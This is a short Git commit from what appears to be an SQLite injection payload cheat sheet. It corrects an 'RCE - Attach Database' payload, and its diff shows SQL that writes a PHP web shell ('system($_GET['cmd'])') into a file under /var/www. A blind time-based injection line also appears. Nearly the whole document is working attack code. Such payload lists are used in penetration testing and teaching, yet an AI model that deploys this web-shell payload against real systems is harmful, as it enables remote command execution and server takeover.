Fixing "RCE - Attach Database" Payload

The old payload doesn't work for many cases as the `php` in `<?php` is missing.
This commit is contained in:
malet 2021-12-14 19:54:41 +01:00 committed by GitHub
parent 5714b9c9d7
commit 4ab2649317
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -82,7 +82,7 @@ AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
INSERT INTO lol.pwn (dataz) VALUES ('<?php system($_GET['cmd']); ?>');--
```
## Remote Command Execution using SQLite command - Load_extension